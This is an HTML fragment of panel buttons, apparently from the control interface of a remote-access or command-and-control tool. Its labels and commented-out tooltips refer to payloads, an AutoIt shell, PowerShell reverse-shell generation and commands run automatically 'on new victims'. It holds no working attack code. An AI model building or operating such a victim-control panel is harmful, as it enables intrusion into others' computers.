<a class="modern_button" onclick="open_button('change_password_form')" style="--clr:#851804" ><span>change password</span><i></i></a>

<!-- <button class="button-34" role="button" onclick="open_button('change_password_form')">change
    password</button> -->
<!-- <button class="button-34" role="button" onclick="open_button('auto_command_div')" title="handle modules">custom module
    </button> -->
    <a class="modern_button" onclick="open_button('auto_command_div')" style="--clr:#851804" ><span>custom module</span><i></i></a>

<!-- <button class="button-34" role="button" onclick="open_button('open_autoit_div')">create autoit
    shell</button> -->

<!-- <button class="button-34" role="button" onclick="open_button('open_on_connection_div')" title="add commands that will run automatic on new victims">on
    connection command</button> -->
    <!-- <button class="button-34" role="button" onclick="open_button('powershell_div')" title="generate powershell reverse shell">
        powershell</button> -->
        <a class="modern_button" onclick="open_button('payloads_div')" style="--clr:#851804" ><span>payloads</span><i></i></a>
